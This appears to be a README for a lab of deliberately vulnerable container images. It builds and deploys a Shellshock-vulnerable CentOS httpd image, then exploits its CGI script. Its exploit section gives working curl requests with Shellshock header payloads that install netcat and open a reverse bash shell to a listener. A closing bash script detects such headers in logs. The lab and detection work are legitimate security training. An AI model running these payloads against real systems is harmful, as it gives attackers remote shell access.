A collection of vulnerable container images

Shellshock vulnerable image

Build

Old CentOS images are here: https://vault.centos.org/

Install CentOS 6.5 from the minimal ISO in a virtual machine.

sudo virt-install --name centos6 --os-variant centos6.5 --memory 2048 --vcpus 2 --disk size=10,alias.name=centos6 --hvm --network network=default --cdrom /var/lib/libvirt/images/CentOS-6.5-x86_64-minimal.iso

Mount the qcow2 image as explained here.

sudo qemu-nbd --connect=/dev/nbd0 /var/lib/libvirt/images/disk.qcow2
sudo mount /dev/mapper/VolGroup-lv_root /mnt/
sudo tar -cvf /tmp/centos6.tar -C /mnt .
sudo umount /mnt
sudo qemu-nbd --disconnect /dev/nbd0

Create the container image.

sudo podman import /tmp/centos6.tar vulnerable-centos:6
sudo buildah bud -t vulnerable-httpd:centos-6 .

Push the image to the registry of your choice.

sudo podman tag localhost/vulnerable-httpd:centos-6 registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
sudo podman push registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6

Usage

sudo podman run -d --rm --name vulnerable-httpd vulnerable-httpd:centos-6
POD_IP=$(sudo podman inspect --format "{{.NetworkSettings.IPAddress}}" vulnerable-httpd)
sh-4.1# curl http://$POD_IP/cgi-bin/hello.cgi -H "X-Name: Nicolas"
Hello, Nicolas!
sh-4.1# curl http://$POD_IP/cgi-bin/hello.cgi
Hello, World!

Deployment

oc apply -f openshift/

Exploit

Find the URL of the vulnerable CGI script.

export TARGET="https://$(oc get route frontend -n vulnerable-httpd -o jsonpath="{.spec.host}")/cgi-bin/hello.cgi"

Start a C&C server.

sudo firewall-cmd --add-port 6666/tcp
nc -l -p 6666

Set the IP address of the C&C server.

export SERVER_IP=192.168.6.2

Exploit the target.

curl "$TARGET" -H "X-Name: () { :; }; /usr/bin/yum install -y nc"
curl "$TARGET" -H "X-Name: () { :; }; /bin/bash -i >& /dev/tcp/$SERVER_IP/6666 0>&1"
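Detection

Both requests above carry a header value that starts with a bash function definition. The following added example (not part of this repository) flags such values in a request log. It assumes a constructed tab-separated log of client IP, path and X-Name value; the function names and sample lines are hypothetical.

```bash
#!/bin/bash
# Added example: flag header values that begin with a bash function
# definition "() {", the prefix a vulnerable bash imports from the environment.

# Return 0 when the value starts with "() {".
# Leading whitespace is tolerated because HTTP servers trim it from header
# values before the CGI environment is built.
is_shellshock_value() {
    printf '%s\n' "$1" | grep -Eq '^[[:space:]]*\(\)[[:space:]]*\{'
}

# Read "client_ip<TAB>path<TAB>header_value" lines on stdin (assumed format)
# and print "client_ip path" for every suspicious request.
scan_log() {
    while IFS="$(printf '\t')" read -r ip path value; do
        if is_shellshock_value "$value"; then
            printf '%s %s\n' "$ip" "$path"
        fi
    done
}

# Constructed sample log: two benign values, two flagged ones.
sample_log() {
    printf '%s\t%s\t%s\n' \
        '10.0.0.5' '/cgi-bin/hello.cgi' 'Nicolas' \
        '10.0.0.9' '/cgi-bin/hello.cgi' '() { :; }; /usr/bin/yum install -y nc' \
        '10.0.0.7' '/cgi-bin/hello.cgi' 'Anne (dev) {ops}' \
        '10.0.0.9' '/cgi-bin/hello.cgi' '  () { :; }; /bin/bash -i'
}

sample_log | scan_log
```

A stock access log does not record X-Name, so the header has to be added to the log format, or the same check applied at a reverse proxy, before this can see anything.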